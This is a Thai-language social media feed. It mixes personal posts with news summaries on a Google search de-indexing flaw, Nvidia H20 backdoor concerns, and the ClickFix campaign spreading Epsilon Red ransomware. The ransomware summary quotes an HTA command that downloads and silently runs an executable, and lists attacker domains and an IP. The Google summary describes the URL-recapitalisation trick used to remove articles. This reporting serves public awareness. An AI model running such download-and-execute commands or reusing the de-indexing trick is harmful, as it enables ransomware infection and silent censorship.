• เรื่องของเรื่อง อยากอัพศิลปะ (คือมีพริ๊นเลเซอร์สีแต่อยากเติมผงหมึกเอง)
    ไม่ให้ช่างที่ชำนาญทำ
    555+

    ผลที่ได้คือ
    ตามรูป

    เราไม่ใช่ตั้งใจติสท์ แต่ผลออกมา มันได้อ่ะ

    เรื่องของเรื่อง อยากอัพศิลปะ (คือมีพริ๊นเลเซอร์สีแต่อยากเติมผงหมึกเอง) ไม่ให้ช่างที่ชำนาญทำ 555+ ผลที่ได้คือ ตามรูป เราไม่ใช่ตั้งใจติสท์ แต่ผลออกมา มันได้อ่ะ
    0 ความคิดเห็น 0 การแบ่งปัน 17 มุมมอง 0 รีวิว
  • เย็นวันอาทิตย์ กับเสียงเพลงที่ไม่มีวันจาง – I Like Chopin

    ลุงยังจำได้ดี... หน้าร้อนช่วงหนึ่งของวัยเด็ก ในเย็นวันอาทิตย์ที่แสงแดดเริ่มอ่อนลง เสียงจั๊กจั่นเงียบลงไปทีละตัว สายลมจากพัดลมโต๊ะตัวเก่าๆ หมุนวนอย่างช้าๆ พ่อมักจะเปิดวิทยุทรานซิสเตอร์ที่ต่อกับเครื่องเสียงของแกที่ซื้อมาประกอบเอง

    ทุกวันอาทิตย์ช่วงเย็น พ่อจะหมุนหาคลื่นวิทยุที่เปิดเพลงจากต่างประเทศ แนวที่เขาชอบมักเป็นเพลงสากลนุ่มๆ จากยุค 70s หรือ 80s และในบรรดาเพลงเหล่านั้น มีอยู่เพลงหนึ่งที่ยังฝังอยู่ในความทรงจำของผมเสมอ...

    "Raining Days .. Never Say "Goodbye"...

    เสียงเปียโนเบาๆ ดังขึ้นพร้อมเสียงร้องของนักร้องชายที่ผมตอนนั้นยังไม่รู้จักชื่อ รู้แค่ว่ามันไพเราะเหลือเกิน จนผมนั่งนิ่งอยู่ตรงพื้นเย็นๆ ฟังด้วยหัวใจเบาๆ เหมือนโลกเงียบไปทั้งใบ และมีแค่เสียงเพลงนี้ลอยอยู่ในอากาศ

    พ่อหันมายิ้ม แล้วพูดว่า
    “เพลงนี้ชื่อ I Like Chopin – เพราะดีนะ... เหมือนฟังเปียโนตอนฝนตก”

    วันนั้นเป็นครั้งแรกที่ลุงรู้จักชื่อ Gazebo ชื่อนี้แปลกสำหรับเด็กไทยอย่างลุง แต่ความแปลกก็ยิ่งทำให้ลุงจำได้ เพลงนี้เป็นของศิลปินลูกครึ่งอิตาลี-อเมริกัน ที่ชื่อจริงคือ Paul Mazzolini แต่ลุงเรียกเขาตามที่วิทยุบอกว่า “กาเซโบ”

    ภายหลังเมื่อลุงโตขึ้น ได้รู้ว่าเพลงนี้ออกมาในปี 1983 เป็นผลงานที่ทำร่วมกับโปรดิวเซอร์ชื่อดัง Pierluigi Giombini และแม้ชื่อเพลงจะบอกว่า “ฉันชอบโชแปง” แต่มันไม่ได้ใช้บทเพลงของโชแปงจริงๆ — เพียงแต่สร้างบรรยากาศเหงาและคลาสสิกเหมือนนั่งฟังเปียโนกลางสายฝนเย็น

    เพลงนี้เคย ขึ้นอันดับ 1 ในหลายประเทศทั่วโลก
    มียอดขายทะลุกว่า 8 ล้านแผ่น
    กลายเป็นตำนานของแนวเพลง Italo Disco
    และยังมีคนนำมา คัฟเวอร์และรีมิกซ์ อยู่เรื่อยๆ จนถึงปัจจุบัน

    กว่า 20 ปีผ่านไป ลุงเจอเพลงนี้อีกครั้งใน Youtube ตอนปลายทศวรรษ 2000 เสียงเปียโนในอินโทรยังคงเหมือนเดิมไม่เปลี่ยน เสียงร้องยังคงห่อหุ้มความทรงจำของลุงเอาไว้อย่างแผ่วเบา

    มันไม่ใช่แค่เพลงสากลเพลงหนึ่ง แต่มันคือหนึ่งใน ภาพจำของวัยเยาว์ ที่รวมเอากลิ่นหน้าร้อน แสงเย็นของวันอาทิตย์ เสียงพ่อหรี่พัดลมให้เบา และความสงบของบ้านหลังเก่าเอาไว้ในท่วงทำนองเดียว

    วันนี้ แม้ลุงจะเปิดเพลงจาก Spotify ผ่านลำโพงไร้สายที่ทันสมัย แต่ใจลุงก็ยังลอยกลับไปในเย็นวันนั้นเสมอ... วันที่ “I Like Chopin” ดังผ่านชุดวิทยุเครื่องเสียงของพ่อ และได้รู้จักความสวยงามของเสียงดนตรี... เป็นครั้งแรกในชีวิต

    #ลุงเล่าหลานฟัง

    https://youtu.be/Dtrgwqei7ww
    ☀️ เย็นวันอาทิตย์ กับเสียงเพลงที่ไม่มีวันจาง – I Like Chopin ลุงยังจำได้ดี... หน้าร้อนช่วงหนึ่งของวัยเด็ก ในเย็นวันอาทิตย์ที่แสงแดดเริ่มอ่อนลง เสียงจั๊กจั่นเงียบลงไปทีละตัว สายลมจากพัดลมโต๊ะตัวเก่าๆ หมุนวนอย่างช้าๆ พ่อมักจะเปิดวิทยุทรานซิสเตอร์ที่ต่อกับเครื่องเสียงของแกที่ซื้อมาประกอบเอง ทุกวันอาทิตย์ช่วงเย็น พ่อจะหมุนหาคลื่นวิทยุที่เปิดเพลงจากต่างประเทศ แนวที่เขาชอบมักเป็นเพลงสากลนุ่มๆ จากยุค 70s หรือ 80s และในบรรดาเพลงเหล่านั้น มีอยู่เพลงหนึ่งที่ยังฝังอยู่ในความทรงจำของผมเสมอ... 🔖 "Raining Days .. Never Say "Goodbye"... 🎵 เสียงเปียโนเบาๆ ดังขึ้นพร้อมเสียงร้องของนักร้องชายที่ผมตอนนั้นยังไม่รู้จักชื่อ รู้แค่ว่ามันไพเราะเหลือเกิน จนผมนั่งนิ่งอยู่ตรงพื้นเย็นๆ ฟังด้วยหัวใจเบาๆ เหมือนโลกเงียบไปทั้งใบ และมีแค่เสียงเพลงนี้ลอยอยู่ในอากาศ พ่อหันมายิ้ม แล้วพูดว่า “เพลงนี้ชื่อ I Like Chopin – เพราะดีนะ... เหมือนฟังเปียโนตอนฝนตก” วันนั้นเป็นครั้งแรกที่ลุงรู้จักชื่อ Gazebo ชื่อนี้แปลกสำหรับเด็กไทยอย่างลุง แต่ความแปลกก็ยิ่งทำให้ลุงจำได้ เพลงนี้เป็นของศิลปินลูกครึ่งอิตาลี-อเมริกัน ที่ชื่อจริงคือ Paul Mazzolini แต่ลุงเรียกเขาตามที่วิทยุบอกว่า “กาเซโบ” ภายหลังเมื่อลุงโตขึ้น ได้รู้ว่าเพลงนี้ออกมาในปี 1983 เป็นผลงานที่ทำร่วมกับโปรดิวเซอร์ชื่อดัง Pierluigi Giombini และแม้ชื่อเพลงจะบอกว่า “ฉันชอบโชแปง” แต่มันไม่ได้ใช้บทเพลงของโชแปงจริงๆ — เพียงแต่สร้างบรรยากาศเหงาและคลาสสิกเหมือนนั่งฟังเปียโนกลางสายฝนเย็น 🎵 เพลงนี้เคย ขึ้นอันดับ 1 ในหลายประเทศทั่วโลก 🎵 มียอดขายทะลุกว่า 8 ล้านแผ่น 🎵 กลายเป็นตำนานของแนวเพลง Italo Disco 🎵 และยังมีคนนำมา คัฟเวอร์และรีมิกซ์ อยู่เรื่อยๆ จนถึงปัจจุบัน กว่า 20 ปีผ่านไป ลุงเจอเพลงนี้อีกครั้งใน Youtube ตอนปลายทศวรรษ 2000 เสียงเปียโนในอินโทรยังคงเหมือนเดิมไม่เปลี่ยน เสียงร้องยังคงห่อหุ้มความทรงจำของลุงเอาไว้อย่างแผ่วเบา มันไม่ใช่แค่เพลงสากลเพลงหนึ่ง แต่มันคือหนึ่งใน ภาพจำของวัยเยาว์ ที่รวมเอากลิ่นหน้าร้อน แสงเย็นของวันอาทิตย์ เสียงพ่อหรี่พัดลมให้เบา และความสงบของบ้านหลังเก่าเอาไว้ในท่วงทำนองเดียว วันนี้ แม้ลุงจะเปิดเพลงจาก Spotify ผ่านลำโพงไร้สายที่ทันสมัย แต่ใจลุงก็ยังลอยกลับไปในเย็นวันนั้นเสมอ... วันที่ “I Like Chopin” ดังผ่านชุดวิทยุเครื่องเสียงของพ่อ และได้รู้จักความสวยงามของเสียงดนตรี... เป็นครั้งแรกในชีวิต #ลุงเล่าหลานฟัง https://youtu.be/Dtrgwqei7ww
    0 ความคิดเห็น 0 การแบ่งปัน 99 มุมมอง 0 รีวิว
  • ทัพบกคุมเข้ม! หลังพบโดรนลึกลับบินเหนือค่ายทหารอุบลฯ สั่งยกระดับรับมือภัยคุกคามทั่วประเทศ พร้อมโชว์ศักยภาพอาวุธเลเซอร์พลังงานสูงทำลายเป้าหมายกลางคืน

    อ่านต่อ..https://news1live.com/detail/9680000073055

    #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    ทัพบกคุมเข้ม! หลังพบโดรนลึกลับบินเหนือค่ายทหารอุบลฯ สั่งยกระดับรับมือภัยคุกคามทั่วประเทศ พร้อมโชว์ศักยภาพอาวุธเลเซอร์พลังงานสูงทำลายเป้าหมายกลางคืน อ่านต่อ..https://news1live.com/detail/9680000073055 #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    3
    0 ความคิดเห็น 0 การแบ่งปัน 315 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: ช่องโหว่ Google ที่ถูกใช้ลบข่าวไม่พึงประสงค์แบบแนบเนียน

    นักข่าวอิสระ Jack Poulson พบว่าบทความของเขาเกี่ยวกับการจับกุม CEO ชื่อ Delwin Maurice Blackman ในปี 2021 ได้หายไปจากผลการค้นหาของ Google แม้จะค้นหาด้วยชื่อบทความแบบตรงเป๊ะก็ไม่เจอ

    หลังจากตรวจสอบร่วมกับ Freedom of the Press Foundation (FPF) พบว่า มีผู้ไม่ประสงค์ดีใช้เครื่องมือ “Refresh Outdated Content” ของ Google เพื่อส่งคำขอให้ลบ URL ที่ดูเหมือนจะล้าสมัย โดยใช้เทคนิคเปลี่ยนตัวอักษรใน URL ให้เป็นตัวพิมพ์ใหญ่บางตัว เช่น “anatomy” เป็น “AnAtomy” ทำให้ Google เข้าใจผิดว่า URL นั้นเสีย (404) และลบ URL จริงที่ยังใช้งานได้ออกจากดัชนีการค้นหาไปด้วย

    Google ยืนยันว่ามีช่องโหว่นี้จริง และได้แก้ไขแล้ว แต่ไม่เปิดเผยว่ามีเว็บไซต์ใดได้รับผลกระทบบ้าง และไม่มีระบบติดตามว่าใครเป็นผู้ส่งคำขอเหล่านั้น

    นักข่าว Jack Poulson พบว่าบทความของเขาหายไปจาก Google Search โดยไม่ทราบสาเหตุ
    แม้จะค้นหาด้วยชื่อบทความแบบตรงก็ไม่พบในผลการค้นหา
    บทความเกี่ยวข้องกับการจับกุม CEO Premise Data ในคดีความรุนแรงในครอบครัว

    Freedom of the Press Foundation ตรวจสอบและพบช่องโหว่ในเครื่องมือ Refresh Outdated Content ของ Google
    ผู้ใช้สามารถส่งคำขอให้ลบ URL ที่ดูเหมือนล้าสมัยได้ แม้จะไม่ใช่เจ้าของเว็บไซต์
    การเปลี่ยนตัวอักษรใน URL ทำให้ Google เข้าใจผิดว่าเป็นลิงก์เสีย

    Google ยืนยันว่ามีช่องโหว่นี้จริง และได้แก้ไขแล้วในเดือนมิถุนายน 2025
    ระบุว่า “มีผลกระทบต่อเว็บไซต์เพียงส่วนน้อย”
    ไม่เปิดเผยจำนวนคำขอที่ถูกใช้ในทางมิชอบ

    บทความของ FPF ที่รายงานเรื่องนี้ก็ถูกลบจาก Google Search ด้วยวิธีเดียวกัน
    มีการส่งคำขอซ้ำหลายครั้งโดยเปลี่ยนตัวอักษรใน URL ทีละตัว
    กลายเป็น “เกมตีตัวตุ่น” ที่ต้องคอยส่งบทความกลับเข้าไปใหม่ตลอด

    ผู้เชี่ยวชาญชี้ว่า ช่องโหว่นี้อาจถูกใช้โดยบริษัทจัดการชื่อเสียงหรือบุคคลมีอิทธิพลเพื่อเซ็นเซอร์ข้อมูล
    ไม่มีระบบติดตามว่าใครเป็นผู้ส่งคำขอ
    เป็นการเซ็นเซอร์แบบเงียบที่ไม่ต้องลบเนื้อหาจริงจากเว็บไซต์

    https://www.techspot.com/news/108880-google-search-flaw-allows-articles-vanish-through-clever.html
    🎙️ เรื่องเล่าจากข่าว: ช่องโหว่ Google ที่ถูกใช้ลบข่าวไม่พึงประสงค์แบบแนบเนียน นักข่าวอิสระ Jack Poulson พบว่าบทความของเขาเกี่ยวกับการจับกุม CEO ชื่อ Delwin Maurice Blackman ในปี 2021 ได้หายไปจากผลการค้นหาของ Google แม้จะค้นหาด้วยชื่อบทความแบบตรงเป๊ะก็ไม่เจอ หลังจากตรวจสอบร่วมกับ Freedom of the Press Foundation (FPF) พบว่า มีผู้ไม่ประสงค์ดีใช้เครื่องมือ “Refresh Outdated Content” ของ Google เพื่อส่งคำขอให้ลบ URL ที่ดูเหมือนจะล้าสมัย โดยใช้เทคนิคเปลี่ยนตัวอักษรใน URL ให้เป็นตัวพิมพ์ใหญ่บางตัว เช่น “anatomy” เป็น “AnAtomy” ทำให้ Google เข้าใจผิดว่า URL นั้นเสีย (404) และลบ URL จริงที่ยังใช้งานได้ออกจากดัชนีการค้นหาไปด้วย Google ยืนยันว่ามีช่องโหว่นี้จริง และได้แก้ไขแล้ว แต่ไม่เปิดเผยว่ามีเว็บไซต์ใดได้รับผลกระทบบ้าง และไม่มีระบบติดตามว่าใครเป็นผู้ส่งคำขอเหล่านั้น ✅ นักข่าว Jack Poulson พบว่าบทความของเขาหายไปจาก Google Search โดยไม่ทราบสาเหตุ ➡️ แม้จะค้นหาด้วยชื่อบทความแบบตรงก็ไม่พบในผลการค้นหา ➡️ บทความเกี่ยวข้องกับการจับกุม CEO Premise Data ในคดีความรุนแรงในครอบครัว ✅ Freedom of the Press Foundation ตรวจสอบและพบช่องโหว่ในเครื่องมือ Refresh Outdated Content ของ Google ➡️ ผู้ใช้สามารถส่งคำขอให้ลบ URL ที่ดูเหมือนล้าสมัยได้ แม้จะไม่ใช่เจ้าของเว็บไซต์ ➡️ การเปลี่ยนตัวอักษรใน URL ทำให้ Google เข้าใจผิดว่าเป็นลิงก์เสีย ✅ Google ยืนยันว่ามีช่องโหว่นี้จริง และได้แก้ไขแล้วในเดือนมิถุนายน 2025 ➡️ ระบุว่า “มีผลกระทบต่อเว็บไซต์เพียงส่วนน้อย” ➡️ ไม่เปิดเผยจำนวนคำขอที่ถูกใช้ในทางมิชอบ ✅ บทความของ FPF ที่รายงานเรื่องนี้ก็ถูกลบจาก Google Search ด้วยวิธีเดียวกัน ➡️ มีการส่งคำขอซ้ำหลายครั้งโดยเปลี่ยนตัวอักษรใน URL ทีละตัว ➡️ กลายเป็น “เกมตีตัวตุ่น” ที่ต้องคอยส่งบทความกลับเข้าไปใหม่ตลอด ✅ ผู้เชี่ยวชาญชี้ว่า ช่องโหว่นี้อาจถูกใช้โดยบริษัทจัดการชื่อเสียงหรือบุคคลมีอิทธิพลเพื่อเซ็นเซอร์ข้อมูล ➡️ ไม่มีระบบติดตามว่าใครเป็นผู้ส่งคำขอ ➡️ เป็นการเซ็นเซอร์แบบเงียบที่ไม่ต้องลบเนื้อหาจริงจากเว็บไซต์ https://www.techspot.com/news/108880-google-search-flaw-allows-articles-vanish-through-clever.html
    WWW.TECHSPOT.COM
    Google search flaw allows articles to vanish through "clever" censorship tactics
    Someone successfully censored a pair of uncomfortable articles that were previously accessible through Google Search. The unknown party exploited a clever trick along with a bug in...
    0 ความคิดเห็น 0 การแบ่งปัน 103 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “H20 ของ Nvidia” กลายเป็นจุดชนวนใหม่ในสงครามเทคโนโลยีระหว่างจีนกับสหรัฐ

    หลังจากสหรัฐฯ ยกเลิกคำสั่งห้ามส่งออกชิป H20 ของ Nvidia ไปยังจีนเมื่อเดือนกรกฎาคม 2025 ซึ่งก่อนหน้านั้นเคยถูกแบนในเดือนเมษายนเนื่องจากข้อกังวลด้านความมั่นคง ล่าสุด Cyberspace Administration of China (CAC) ได้เรียกตัว Nvidia เข้าพบเพื่อขอคำชี้แจงเกี่ยวกับ “ความเสี่ยงด้านความปลอดภัย” ของชิป H20 ที่กำลังจะกลับมาวางขายในจีน

    CAC อ้างว่าได้รับข้อมูลจากผู้เชี่ยวชาญด้าน AI ของสหรัฐฯ ว่าชิป H20 อาจมีฟีเจอร์ “ติดตามตำแหน่ง” และ “ปิดการทำงานจากระยะไกล” ซึ่งอาจกระทบต่อความเป็นส่วนตัวของผู้ใช้ชาวจีน และละเมิดกฎหมายความปลอดภัยไซเบอร์ของประเทศ

    ด้าน Nvidia ยืนยันว่า “ไม่มี backdoor” ในชิปของตน และให้ความสำคัญกับความปลอดภัยไซเบอร์อย่างสูงสุด พร้อมเตรียมส่งเอกสารชี้แจงตามคำขอของ CAC

    ขณะเดียวกัน นักการเมืองสหรัฐฯ ก็เคยเสนอให้มีการติดตั้งระบบติดตามในชิปที่ส่งออกไปต่างประเทศ เพื่อป้องกันการลักลอบนำไปใช้ในทางที่ผิด โดยเฉพาะในจีน ซึ่งอาจนำไปใช้พัฒนา AI ทางทหารหรือระบบเซ็นเซอร์ตรวจสอบประชาชน

    จีนเรียกตัว Nvidia เข้าพบเพื่อขอคำชี้แจงเกี่ยวกับความเสี่ยงด้านความปลอดภัยของชิป H20
    CAC ต้องการเอกสารสนับสนุนเกี่ยวกับความเสี่ยงด้าน backdoor และการติดตาม
    อ้างอิงจากรายงานของผู้เชี่ยวชาญ AI สหรัฐฯ

    ชิป H20 ถูกพัฒนาขึ้นเพื่อให้ผ่านข้อจำกัดการส่งออกของสหรัฐฯ โดยมีประสิทธิภาพต่ำกว่าชิป H100
    ถูกแบนในเดือนเมษายน 2025 และกลับมาขายได้ในเดือนกรกฎาคม
    Nvidia สั่งผลิตเพิ่มอีก 300,000 ตัวจาก TSMC เพื่อรองรับความต้องการในจีน

    Nvidia ยืนยันว่าไม่มี backdoor ในชิปของตน และให้ความสำคัญกับความปลอดภัยไซเบอร์
    “ไม่มีช่องทางลับในการควบคุมหรือเข้าถึงจากระยะไกล”
    พร้อมส่งเอกสารชี้แจงตามคำขอของ CAC

    นักการเมืองสหรัฐฯ เสนอให้มีการติดตั้งระบบติดตามในชิปที่ส่งออกไปต่างประเทศ
    เช่น Chip Security Act ที่เสนอให้มีระบบตรวจสอบตำแหน่งและการใช้งาน
    ยังไม่มีการผ่านเป็นกฎหมายอย่างเป็นทางการ

    จีนยังคงต้องพึ่งพาชิปของ Nvidia สำหรับงานวิจัยและการพัฒนา AI ภายในประเทศ
    แม้จะมีการผลักดันชิปภายในประเทศ เช่น Huawei 910C
    แต่ยังไม่สามารถทดแทน Nvidia ได้ในหลายด้าน

    https://www.techspot.com/news/108886-china-summons-nvidia-over-potential-security-concerns-h20.html
    🧠 เรื่องเล่าจากข่าว: “H20 ของ Nvidia” กลายเป็นจุดชนวนใหม่ในสงครามเทคโนโลยีระหว่างจีนกับสหรัฐ หลังจากสหรัฐฯ ยกเลิกคำสั่งห้ามส่งออกชิป H20 ของ Nvidia ไปยังจีนเมื่อเดือนกรกฎาคม 2025 ซึ่งก่อนหน้านั้นเคยถูกแบนในเดือนเมษายนเนื่องจากข้อกังวลด้านความมั่นคง ล่าสุด Cyberspace Administration of China (CAC) ได้เรียกตัว Nvidia เข้าพบเพื่อขอคำชี้แจงเกี่ยวกับ “ความเสี่ยงด้านความปลอดภัย” ของชิป H20 ที่กำลังจะกลับมาวางขายในจีน CAC อ้างว่าได้รับข้อมูลจากผู้เชี่ยวชาญด้าน AI ของสหรัฐฯ ว่าชิป H20 อาจมีฟีเจอร์ “ติดตามตำแหน่ง” และ “ปิดการทำงานจากระยะไกล” ซึ่งอาจกระทบต่อความเป็นส่วนตัวของผู้ใช้ชาวจีน และละเมิดกฎหมายความปลอดภัยไซเบอร์ของประเทศ ด้าน Nvidia ยืนยันว่า “ไม่มี backdoor” ในชิปของตน และให้ความสำคัญกับความปลอดภัยไซเบอร์อย่างสูงสุด พร้อมเตรียมส่งเอกสารชี้แจงตามคำขอของ CAC ขณะเดียวกัน นักการเมืองสหรัฐฯ ก็เคยเสนอให้มีการติดตั้งระบบติดตามในชิปที่ส่งออกไปต่างประเทศ เพื่อป้องกันการลักลอบนำไปใช้ในทางที่ผิด โดยเฉพาะในจีน ซึ่งอาจนำไปใช้พัฒนา AI ทางทหารหรือระบบเซ็นเซอร์ตรวจสอบประชาชน ✅ จีนเรียกตัว Nvidia เข้าพบเพื่อขอคำชี้แจงเกี่ยวกับความเสี่ยงด้านความปลอดภัยของชิป H20 ➡️ CAC ต้องการเอกสารสนับสนุนเกี่ยวกับความเสี่ยงด้าน backdoor และการติดตาม ➡️ อ้างอิงจากรายงานของผู้เชี่ยวชาญ AI สหรัฐฯ ✅ ชิป H20 ถูกพัฒนาขึ้นเพื่อให้ผ่านข้อจำกัดการส่งออกของสหรัฐฯ โดยมีประสิทธิภาพต่ำกว่าชิป H100 ➡️ ถูกแบนในเดือนเมษายน 2025 และกลับมาขายได้ในเดือนกรกฎาคม ➡️ Nvidia สั่งผลิตเพิ่มอีก 300,000 ตัวจาก TSMC เพื่อรองรับความต้องการในจีน ✅ Nvidia ยืนยันว่าไม่มี backdoor ในชิปของตน และให้ความสำคัญกับความปลอดภัยไซเบอร์ ➡️ “ไม่มีช่องทางลับในการควบคุมหรือเข้าถึงจากระยะไกล” ➡️ พร้อมส่งเอกสารชี้แจงตามคำขอของ CAC ✅ นักการเมืองสหรัฐฯ เสนอให้มีการติดตั้งระบบติดตามในชิปที่ส่งออกไปต่างประเทศ ➡️ เช่น Chip Security Act ที่เสนอให้มีระบบตรวจสอบตำแหน่งและการใช้งาน ➡️ ยังไม่มีการผ่านเป็นกฎหมายอย่างเป็นทางการ ✅ จีนยังคงต้องพึ่งพาชิปของ Nvidia สำหรับงานวิจัยและการพัฒนา AI ภายในประเทศ ➡️ แม้จะมีการผลักดันชิปภายในประเทศ เช่น Huawei 910C ➡️ แต่ยังไม่สามารถทดแทน Nvidia ได้ในหลายด้าน https://www.techspot.com/news/108886-china-summons-nvidia-over-potential-security-concerns-h20.html
    WWW.TECHSPOT.COM
    China summons Nvidia over potential security concerns in H20 chips
    The Cyberspace Administration of China (CAC) said that Nvidia was asked to "clarify and submit relevant supporting documentation regarding security risks, including potential vulnerabilities and backdoors, associated...
    0 ความคิดเห็น 0 การแบ่งปัน 94 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ

    ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows

    เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ

    เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น

    Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย

    Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix”
    หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans
    หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย

    ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH)
    เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0)
    ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง

    แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้
    เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย
    ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง

    Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่
    มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง
    ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส

    โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี
    เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269
    มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี

    ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก
    ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว
    การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป

    องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง
    ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว
    Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที

    การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น
    ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch
    ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ

    ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา
    การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน
    ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย

    https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ 